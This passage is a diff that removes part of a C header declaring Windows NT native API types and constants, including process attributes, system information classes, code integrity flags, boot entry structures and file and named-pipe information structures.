- PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_UMS_THREAD \
- PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_MITIGATION_OPTIONS \
- PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_PROTECTION_LEVEL \
- PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_SECURE_PROCESS \
- PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)
-#define 
PS_ATTRIBUTE_JOB_LIST \
- PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \
- PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \
- PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_WIN32K_FILTER \
- PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \
- PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_BNO_ISOLATION \
- PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \
- PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)
-
-#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
-#define RTL_USER_PROC_PROFILE_USER 0x00000002
-#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
-#define RTL_USER_PROC_PROFILE_SERVER 0x00000008
-#define RTL_USER_PROC_RESERVE_1MB 0x00000020
-#define RTL_USER_PROC_RESERVE_16MB 0x00000040
-#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
-#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
-#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
-#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
-#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
-#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000
-
-/*
-** Processes END
-*/
-
-typedef enum _SYSTEM_INFORMATION_CLASS {
- SystemBasicInformation = 0,
- SystemProcessorInformation = 1,
- SystemPerformanceInformation = 2,
- SystemTimeOfDayInformation = 3,
- SystemPathInformation = 4,
- SystemProcessInformation = 5,
- SystemCallCountInformation = 6,
- SystemDeviceInformation = 7,
- SystemProcessorPerformanceInformation = 8,
- SystemFlagsInformation = 9,
- SystemCallTimeInformation = 10,
- SystemModuleInformation = 11,
- SystemLocksInformation = 12,
- SystemStackTraceInformation = 13,
- SystemPagedPoolInformation = 14,
- SystemNonPagedPoolInformation = 
15,
- SystemHandleInformation = 16,
- SystemObjectInformation = 17,
- SystemPageFileInformation = 18,
- SystemVdmInstemulInformation = 19,
- SystemVdmBopInformation = 20,
- SystemFileCacheInformation = 21,
- SystemPoolTagInformation = 22,
- SystemInterruptInformation = 23,
- SystemDpcBehaviorInformation = 24,
- SystemFullMemoryInformation = 25,
- SystemLoadGdiDriverInformation = 26,
- SystemUnloadGdiDriverInformation = 27,
- SystemTimeAdjustmentInformation = 28,
- SystemSummaryMemoryInformation = 29,
- SystemMirrorMemoryInformation = 30,
- SystemPerformanceTraceInformation = 31,
- SystemObsolete0 = 32,
- SystemExceptionInformation = 33,
- SystemCrashDumpStateInformation = 34,
- SystemKernelDebuggerInformation = 35,
- SystemContextSwitchInformation = 36,
- SystemRegistryQuotaInformation = 37,
- SystemExtendServiceTableInformation = 38,
- SystemPrioritySeperation = 39,
- SystemVerifierAddDriverInformation = 40,
- SystemVerifierRemoveDriverInformation = 41,
- SystemProcessorIdleInformation = 42,
- SystemLegacyDriverInformation = 43,
- SystemCurrentTimeZoneInformation = 44,
- SystemLookasideInformation = 45,
- SystemTimeSlipNotification = 46,
- SystemSessionCreate = 47,
- SystemSessionDetach = 48,
- SystemSessionInformation = 49,
- SystemRangeStartInformation = 50,
- SystemVerifierInformation = 51,
- SystemVerifierThunkExtend = 52,
- SystemSessionProcessInformation = 53,
- SystemLoadGdiDriverInSystemSpace = 54,
- SystemNumaProcessorMap = 55,
- SystemPrefetcherInformation = 56,
- SystemExtendedProcessInformation = 57,
- SystemRecommendedSharedDataAlignment = 58,
- SystemComPlusPackage = 59,
- SystemNumaAvailableMemory = 60,
- SystemProcessorPowerInformation = 61,
- SystemEmulationBasicInformation = 62,
- SystemEmulationProcessorInformation = 63,
- SystemExtendedHandleInformation = 64,
- SystemLostDelayedWriteInformation = 65,
- SystemBigPoolInformation = 66,
- SystemSessionPoolTagInformation = 67,
- SystemSessionMappedViewInformation = 68,
- SystemHotpatchInformation = 
69,
- SystemObjectSecurityMode = 70,
- SystemWatchdogTimerHandler = 71,
- SystemWatchdogTimerInformation = 72,
- SystemLogicalProcessorInformation = 73,
- SystemWow64SharedInformationObsolete = 74,
- SystemRegisterFirmwareTableInformationHandler = 75,
- SystemFirmwareTableInformation = 76,
- SystemModuleInformationEx = 77,
- SystemVerifierTriageInformation = 78,
- SystemSuperfetchInformation = 79,
- SystemMemoryListInformation = 80,
- SystemFileCacheInformationEx = 81,
- SystemThreadPriorityClientIdInformation = 82,
- SystemProcessorIdleCycleTimeInformation = 83,
- SystemVerifierCancellationInformation = 84,
- SystemProcessorPowerInformationEx = 85,
- SystemRefTraceInformation = 86,
- SystemSpecialPoolInformation = 87,
- SystemProcessIdInformation = 88,
- SystemErrorPortInformation = 89,
- SystemBootEnvironmentInformation = 90,
- SystemHypervisorInformation = 91,
- SystemVerifierInformationEx = 92,
- SystemTimeZoneInformation = 93,
- SystemImageFileExecutionOptionsInformation = 94,
- SystemCoverageInformation = 95,
- SystemPrefetchPatchInformation = 96,
- SystemVerifierFaultsInformation = 97,
- SystemSystemPartitionInformation = 98,
- SystemSystemDiskInformation = 99,
- SystemProcessorPerformanceDistribution = 100,
- SystemNumaProximityNodeInformation = 101,
- SystemDynamicTimeZoneInformation = 102,
- SystemCodeIntegrityInformation = 103,
- SystemProcessorMicrocodeUpdateInformation = 104,
- SystemProcessorBrandString = 105,
- SystemVirtualAddressInformation = 106,
- SystemLogicalProcessorAndGroupInformation = 107,
- SystemProcessorCycleTimeInformation = 108,
- SystemStoreInformation = 109,
- SystemRegistryAppendString = 110,
- SystemAitSamplingValue = 111,
- SystemVhdBootInformation = 112,
- SystemCpuQuotaInformation = 113,
- SystemNativeBasicInformation = 114,
- SystemErrorPortTimeouts = 115,
- SystemLowPriorityIoInformation = 116,
- SystemBootEntropyInformation = 117,
- SystemVerifierCountersInformation = 118,
- SystemPagedPoolInformationEx = 119,
- 
SystemSystemPtesInformationEx = 120,
- SystemNodeDistanceInformation = 121,
- SystemAcpiAuditInformation = 122,
- SystemBasicPerformanceInformation = 123,
- SystemQueryPerformanceCounterInformation = 124,
- SystemSessionBigPoolInformation = 125,
- SystemBootGraphicsInformation = 126,
- SystemScrubPhysicalMemoryInformation = 127,
- SystemBadPageInformation = 128,
- SystemProcessorProfileControlArea = 129,
- SystemCombinePhysicalMemoryInformation = 130,
- SystemEntropyInterruptTimingInformation = 131,
- SystemConsoleInformation = 132,
- SystemPlatformBinaryInformation = 133,
- SystemPolicyInformation = 134,
- SystemHypervisorProcessorCountInformation = 135,
- SystemDeviceDataInformation = 136,
- SystemDeviceDataEnumerationInformation = 137,
- SystemMemoryTopologyInformation = 138,
- SystemMemoryChannelInformation = 139,
- SystemBootLogoInformation = 140,
- SystemProcessorPerformanceInformationEx = 141,
- SystemSpare0 = 142,
- SystemSecureBootPolicyInformation = 143,
- SystemPageFileInformationEx = 144,
- SystemSecureBootInformation = 145,
- SystemEntropyInterruptTimingRawInformation = 146,
- SystemPortableWorkspaceEfiLauncherInformation = 147,
- SystemFullProcessInformation = 148,
- SystemKernelDebuggerInformationEx = 149,
- SystemBootMetadataInformation = 150,
- SystemSoftRebootInformation = 151,
- SystemElamCertificateInformation = 152,
- SystemOfflineDumpConfigInformation = 153,
- SystemProcessorFeaturesInformation = 154,
- SystemRegistryReconciliationInformation = 155,
- SystemEdidInformation = 156,
- SystemManufacturingInformation = 157,
- SystemEnergyEstimationConfigInformation = 158,
- SystemHypervisorDetailInformation = 159,
- SystemProcessorCycleStatsInformation = 160,
- SystemVmGenerationCountInformation = 161,
- SystemTrustedPlatformModuleInformation = 162,
- SystemKernelDebuggerFlags = 163,
- SystemCodeIntegrityPolicyInformation = 164,
- SystemIsolatedUserModeInformation = 165,
- SystemHardwareSecurityTestInterfaceResultsInformation = 166,
- 
SystemSingleModuleInformation = 167,
- SystemAllowedCpuSetsInformation = 168,
- SystemDmaProtectionInformation = 169,
- SystemInterruptCpuSetsInformation = 170,
- SystemSecureBootPolicyFullInformation = 171,
- SystemCodeIntegrityPolicyFullInformation = 172,
- SystemAffinitizedInterruptProcessorInformation = 173,
- SystemRootSiloInformation = 174,
- SystemCpuSetInformation = 175,
- SystemCpuSetTagInformation = 176,
- SystemWin32WerStartCallout = 177,
- SystemSecureKernelProfileInformation = 178,
- SystemCodeIntegrityPlatformManifestInformation = 179,
- SystemInterruptSteeringInformation = 180,
- SystemSupportedProcessorArchitectures = 181,
- SystemMemoryUsageInformation = 182,
- SystemCodeIntegrityCertificateInformation = 183,
- SystemPhysicalMemoryInformation = 184,
- SystemControlFlowTransition = 185,
- SystemKernelDebuggingAllowed = 186,
- SystemActivityModerationExeState = 187,
- SystemActivityModerationUserSettings = 188,
- SystemCodeIntegrityPoliciesFullInformation = 189,
- SystemCodeIntegrityUnlockInformation = 190,
- SystemIntegrityQuotaInformation = 191,
- SystemFlushInformation = 192,
- SystemProcessorIdleMaskInformation = 193,
- SystemSecureDumpEncryptionInformation = 194,
- SystemWriteConstraintInformation = 195,
- SystemKernelVaShadowInformation = 196,
- SystemHypervisorSharedPageInformation = 197,
- SystemFirmwareBootPerformanceInformation = 198,
- SystemCodeIntegrityVerificationInformation = 199,
- SystemFirmwarePartitionInformation = 200,
- SystemSpeculationControlInformation = 201,
- SystemDmaGuardPolicyInformation = 202,
- SystemEnclaveLaunchControlInformation = 203,
- SystemWorkloadAllowedCpuSetsInformation = 204,
- SystemCodeIntegrityUnlockModeInformation = 205,
- SystemLeapSecondInformation = 206,
- SystemFlags2Information = 207,
- MaxSystemInfoClass
-} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
-
-//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
-typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
- 
struct {
- ULONG BpbEnabled : 1;
- ULONG BpbDisabledSystemPolicy : 1;
- ULONG BpbDisabledNoHardwareSupport : 1;
- ULONG SpecCtrlEnumerated : 1;
- ULONG SpecCmdEnumerated : 1;
- ULONG IbrsPresent : 1;
- ULONG StibpPresent : 1;
- ULONG SmepPresent : 1;
- ULONG SpeculativeStoreBypassDisableAvailable : 1;
- ULONG SpeculativeStoreBypassDisableSupported : 1;
- ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
- ULONG SpeculativeStoreBypassDisabledKernel : 1;
- ULONG SpeculativeStoreBypassDisableRequired : 1;
- ULONG BpbDisabledKernelToUser : 1;
- ULONG SpecCtrlRetpolineEnabled : 1;
- ULONG SpecCtrlImportOptimizationEnabled : 1;
- ULONG Reserved : 16;
- } SpeculationControlFlags;
-} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
-
-typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {
- struct {
- ULONG KvaShadowEnabled : 1;
- ULONG KvaShadowUserGlobal : 1;
- ULONG KvaShadowPcid : 1;
- ULONG KvaShadowInvpcid : 1;
- ULONG KvaShadowRequired : 1;
- ULONG KvaShadowRequiredAvailable : 1;
- ULONG InvalidPteBit : 6;
- ULONG L1DataCacheFlushSupported : 1;
- ULONG L1TerminalFaultMitigationPresent : 1;
- ULONG Reserved : 18;
- } KvaShadowFlags;
-} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
-
-typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
- ULONG Length;
- ULONG CodeIntegrityOptions;
-} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
-
-#define CODEINTEGRITY_OPTION_ENABLED 0x01
-#define CODEINTEGRITY_OPTION_TESTSIGN 0x02
-#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x04
-#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x08
-#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x10
-#define CODEINTEGRITY_OPTION_TEST_BUILD 0x20
-#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x40
-#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x80
-#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x100
-#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x200
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 
0x400
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x800
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
-#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
-
-typedef VOID(NTAPI *PIO_APC_ROUTINE)(
- _In_ PVOID ApcContext,
- _In_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG Reserved
- );
-
-#define InitializeObjectAttributes( p, n, a, r, s ) { \
- (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
- (p)->RootDirectory = r; \
- (p)->Attributes = a; \
- (p)->ObjectName = n; \
- (p)->SecurityDescriptor = s; \
- (p)->SecurityQualityOfService = NULL; \
- }
-
-typedef struct _SYSTEM_VHD_BOOT_INFORMATION {
- BOOLEAN OsDiskIsVhd;
- ULONG OsVhdFilePathOffset;
- WCHAR OsVhdParentVolume[ANYSIZE_ARRAY];
-} SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION;
-
-typedef struct _SYSTEM_OBJECTTYPE_INFORMATION {
- ULONG NextEntryOffset;
- ULONG NumberOfObjects;
- ULONG NumberOfHandles;
- ULONG TypeIndex;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG PoolType;
- BOOLEAN SecurityRequired;
- BOOLEAN WaitableObject;
- UNICODE_STRING TypeName;
-} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION;
-
-typedef struct _SYSTEM_OBJECT_INFORMATION {
- ULONG NextEntryOffset;
- PVOID Object;
- HANDLE CreatorUniqueProcess;
- USHORT CreatorBackTraceIndex;
- USHORT Flags;
- LONG PointerCount;
- LONG HandleCount;
- ULONG PagedPoolCharge;
- ULONG NonPagedPoolCharge;
- HANDLE ExclusiveProcessId;
- PVOID SecurityDescriptor;
- UNICODE_STRING NameInfo;
-} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION;
-
-/*
-** Boot Entry START
-*/
-
-typedef struct _FILE_PATH {
- ULONG Version;
- ULONG Length;
- ULONG Type;
- UCHAR FilePath[ANYSIZE_ARRAY];
-} FILE_PATH, *PFILE_PATH;
-
-typedef struct _BOOT_ENTRY {
- ULONG Version;
- ULONG Length;
- ULONG Id;
- ULONG Attributes;
- ULONG FriendlyNameOffset;
- ULONG BootFilePathOffset;
- ULONG OsOptionsLength;
- UCHAR OsOptions[ANYSIZE_ARRAY];
-} BOOT_ENTRY, 
*PBOOT_ENTRY;
-
-typedef struct _BOOT_ENTRY_LIST {
- ULONG NextEntryOffset;
- BOOT_ENTRY BootEntry;
-} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
-
-/*
-** Boot Entry END
-*/
-
-/*
-** File start
-*/
-
-#define FILE_SUPERSEDE 0x00000000
-#define FILE_OPEN 0x00000001
-#define FILE_CREATE 0x00000002
-#define FILE_OPEN_IF 0x00000003
-#define FILE_OVERWRITE 0x00000004
-#define FILE_OVERWRITE_IF 0x00000005
-#define FILE_MAXIMUM_DISPOSITION 0x00000005
-
-#define FILE_DIRECTORY_FILE 0x00000001
-#define FILE_WRITE_THROUGH 0x00000002
-#define FILE_SEQUENTIAL_ONLY 0x00000004
-#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
-
-#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
-#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
-#define FILE_NON_DIRECTORY_FILE 0x00000040
-#define FILE_CREATE_TREE_CONNECTION 0x00000080
-
-#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
-#define FILE_NO_EA_KNOWLEDGE 0x00000200
-#define FILE_OPEN_FOR_RECOVERY 0x00000400
-#define FILE_RANDOM_ACCESS 0x00000800
-
-#define FILE_DELETE_ON_CLOSE 0x00001000
-#define FILE_OPEN_BY_FILE_ID 0x00002000
-#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
-#define FILE_NO_COMPRESSION 0x00008000
-
-#define FILE_RESERVE_OPFILTER 0x00100000
-#define FILE_OPEN_REPARSE_POINT 0x00200000
-#define FILE_OPEN_NO_RECALL 0x00400000
-#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
-
-
-#define FILE_COPY_STRUCTURED_STORAGE 0x00000041
-#define FILE_STRUCTURED_STORAGE 0x00000441
-
-#define FILE_VALID_OPTION_FLAGS 0x00ffffff
-#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032
-#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032
-#define FILE_VALID_SET_FLAGS 0x00000036
-
-typedef enum _FILE_INFORMATION_CLASS {
- FileDirectoryInformation = 1,
- FileFullDirectoryInformation,
- FileBothDirectoryInformation,
- FileBasicInformation,
- FileStandardInformation,
- FileInternalInformation,
- FileEaInformation,
- FileAccessInformation,
- FileNameInformation,
- FileRenameInformation,
- FileLinkInformation,
- FileNamesInformation,
- FileDispositionInformation,
- FilePositionInformation,
- FileFullEaInformation,
- FileModeInformation,
- FileAlignmentInformation,
- FileAllInformation,
- FileAllocationInformation,
- FileEndOfFileInformation,
- FileAlternateNameInformation,
- FileStreamInformation,
- FilePipeInformation,
- FilePipeLocalInformation,
- FilePipeRemoteInformation,
- FileMailslotQueryInformation,
- FileMailslotSetInformation,
- FileCompressionInformation,
- FileObjectIdInformation,
- FileCompletionInformation,
- FileMoveClusterInformation,
- FileQuotaInformation,
- FileReparsePointInformation,
- FileNetworkOpenInformation,
- FileAttributeTagInformation,
- FileTrackingInformation,
- FileIdBothDirectoryInformation,
- FileIdFullDirectoryInformation,
- FileValidDataLengthInformation,
- FileShortNameInformation,
- FileIoCompletionNotificationInformation,
- FileIoStatusBlockRangeInformation,
- FileIoPriorityHintInformation,
- FileSfioReserveInformation,
- FileSfioVolumeInformation,
- FileHardLinkInformation,
- FileProcessIdsUsingFileInformation,
- FileNormalizedNameInformation,
- FileNetworkPhysicalNameInformation,
- FileIdGlobalTxDirectoryInformation,
- FileIsRemoteDeviceInformation,
- FileUnusedInformation,
- FileNumaNodeInformation,
- FileStandardLinkInformation,
- FileRemoteProtocolInformation,
- FileRenameInformationBypassAccessCheck,
- FileLinkInformationBypassAccessCheck,
- FileVolumeNameInformation,
- FileIdInformation,
- FileIdExtdDirectoryInformation,
- FileReplaceCompletionInformation,
- FileHardLinkFullIdInformation,
- FileIdExtdBothDirectoryInformation,
- FileDispositionInformationEx,
- FileRenameInformationEx,
- FileRenameInformationExBypassAccessCheck,
- FileDesiredStorageClassInformation,
- FileStatInformation,
- FileMemoryPartitionInformation,
- FileStatLxInformation,
- FileCaseSensitiveInformation,
- FileMaximumInformation
-} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
-
-typedef enum _FSINFOCLASS {
- FileFsVolumeInformation = 1,
- FileFsLabelInformation,
- FileFsSizeInformation,
- 
FileFsDeviceInformation,
- FileFsAttributeInformation,
- FileFsControlInformation,
- FileFsFullSizeInformation,
- FileFsObjectIdInformation,
- FileFsDriverPathInformation,
- FileFsVolumeFlagsInformation,
- FileFsSectorSizeInformation,
- FileFsDataCopyInformation,
- FileFsMetadataSizeInformation,
- FileFsMaximumInformation
-} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;
-
-typedef struct _FILE_BASIC_INFORMATION {
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- ULONG FileAttributes;
-} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
-
-typedef struct _FILE_STANDARD_INFORMATION {
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG NumberOfLinks;
- UCHAR DeletePending;
- UCHAR Directory;
-} FILE_STANDARD_INFORMATION;
-
-typedef struct _FILE_STANDARD_INFORMATION_EX {
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG NumberOfLinks;
- BOOLEAN DeletePending;
- BOOLEAN Directory;
- BOOLEAN AlternateStream;
- BOOLEAN MetadataAttribute;
-} FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX;
-
-typedef struct _FILE_INTERNAL_INFORMATION {
- LARGE_INTEGER IndexNumber;
-} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
-
-typedef struct _FILE_EA_INFORMATION {
- ULONG EaSize;
-} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
-
-typedef struct _FILE_ACCESS_INFORMATION {
- ACCESS_MASK AccessFlags;
-} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
-
-typedef struct _FILE_POSITION_INFORMATION {
- LARGE_INTEGER CurrentByteOffset;
-} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
-
-typedef struct _FILE_MODE_INFORMATION {
- ULONG Mode;
-} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
-
-typedef struct _FILE_ALIGNMENT_INFORMATION {
- ULONG AlignmentRequirement;
-} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
-
-typedef struct _FILE_NAME_INFORMATION {
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_NAME_INFORMATION, 
*PFILE_NAME_INFORMATION;
-
-typedef struct _FILE_ALL_INFORMATION {
- FILE_BASIC_INFORMATION BasicInformation;
- FILE_STANDARD_INFORMATION StandardInformation;
- FILE_INTERNAL_INFORMATION InternalInformation;
- FILE_EA_INFORMATION EaInformation;
- FILE_ACCESS_INFORMATION AccessInformation;
- FILE_POSITION_INFORMATION PositionInformation;
- FILE_MODE_INFORMATION ModeInformation;
- FILE_ALIGNMENT_INFORMATION AlignmentInformation;
- FILE_NAME_INFORMATION NameInformation;
-} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
-
-typedef struct _FILE_NETWORK_OPEN_INFORMATION {
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG FileAttributes;
-} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
-
-typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
- ULONG FileAttributes;
- ULONG ReparseTag;
-} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
-
-typedef struct _FILE_ALLOCATION_INFORMATION {
- LARGE_INTEGER AllocationSize;
-} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
-
-typedef struct _FILE_COMPRESSION_INFORMATION {
- LARGE_INTEGER CompressedFileSize;
- USHORT CompressionFormat;
- UCHAR CompressionUnitShift;
- UCHAR ChunkShift;
- UCHAR ClusterShift;
- UCHAR Reserved[3];
-} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;
-
-typedef struct _FILE_DISPOSITION_INFORMATION {
- BOOLEAN DeleteFile;
-} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
-
-typedef struct _FILE_END_OF_FILE_INFORMATION {
- LARGE_INTEGER EndOfFile;
-} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
-
-typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
- LARGE_INTEGER ValidDataLength;
-} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
-
-typedef struct _FILE_LINK_INFORMATION {
- BOOLEAN ReplaceIfExists;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR 
FileName[1];
-} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
-
-typedef struct _FILE_MOVE_CLUSTER_INFORMATION {
- ULONG ClusterCount;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;
-
-typedef struct _FILE_RENAME_INFORMATION {
- BOOLEAN ReplaceIfExists;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
-
-typedef struct _FILE_STREAM_INFORMATION {
- ULONG NextEntryOffset;
- ULONG StreamNameLength;
- LARGE_INTEGER StreamSize;
- LARGE_INTEGER StreamAllocationSize;
- WCHAR StreamName[1];
-} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
-
-typedef struct _FILE_TRACKING_INFORMATION {
- HANDLE DestinationFile;
- ULONG ObjectInformationLength;
- CHAR ObjectInformation[1];
-} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;
-
-typedef struct _FILE_COMPLETION_INFORMATION {
- HANDLE Port;
- PVOID Key;
-} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;
-
-//
-// Define the NamedPipeType flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000
-#define FILE_PIPE_MESSAGE_TYPE 0x00000001
-
-//
-// Define the CompletionMode flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_QUEUE_OPERATION 0x00000000
-#define FILE_PIPE_COMPLETE_OPERATION 0x00000001
-
-//
-// Define the ReadMode flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000
-#define FILE_PIPE_MESSAGE_MODE 0x00000001
-
-//
-// Define the NamedPipeConfiguration flags for NtQueryInformation
-//
-
-#define FILE_PIPE_INBOUND 0x00000000
-#define FILE_PIPE_OUTBOUND 0x00000001
-#define FILE_PIPE_FULL_DUPLEX 0x00000002
-
-//
-// Define the NamedPipeState flags for NtQueryInformation
-//
-
-#define FILE_PIPE_DISCONNECTED_STATE 0x00000001
-#define FILE_PIPE_LISTENING_STATE 0x00000002
-#define FILE_PIPE_CONNECTED_STATE 0x00000003
-#define FILE_PIPE_CLOSING_STATE 0x00000004
-
-//
-// 
Define the NamedPipeEnd flags for NtQueryInformation
-//
-
-#define FILE_PIPE_CLIENT_END 0x00000000
-#define FILE_PIPE_SERVER_END 0x00000001
-
-
-typedef struct _FILE_PIPE_INFORMATION {
- ULONG ReadMode;
- ULONG CompletionMode;
-} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;
-
-typedef struct _FILE_PIPE_LOCAL_INFORMATION {
- ULONG NamedPipeType;
- ULONG NamedPipeConfiguration;
- ULONG MaximumInstances;
- ULONG CurrentInstances;
- ULONG InboundQuota;
- ULONG ReadDataAvailable;
- ULONG OutboundQuota;
- ULONG WriteQuotaAvailable;
- ULONG NamedPipeState;
- ULONG NamedPipeEnd;
-} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;
-
-typedef struct _FILE_PIPE_REMOTE_INFORMATION {
- LARGE_INTEGER CollectDataTime;
- ULONG MaximumCollectionCount;
-} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;
-
-typedef struct _FILE_MAILSLOT_QUERY_INFORMATION {
- ULONG MaximumMessageSize;
- ULONG MailslotQuota;
- ULONG NextMessageSize;
- ULONG MessagesAvailable;
- LARGE_INTEGER ReadTimeout;
-} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;
-
-typedef struct _FILE_MAILSLOT_SET_INFORMATION {
- PLARGE_INTEGER ReadTimeout;
-} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;
-
-typedef struct _FILE_REPARSE_POINT_INFORMATION {
- LONGLONG FileReference;
- ULONG Tag;
-} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;
-
-typedef struct _FILE_LINK_ENTRY_INFORMATION {
- ULONG NextEntryOffset;
- LONGLONG ParentFileId;
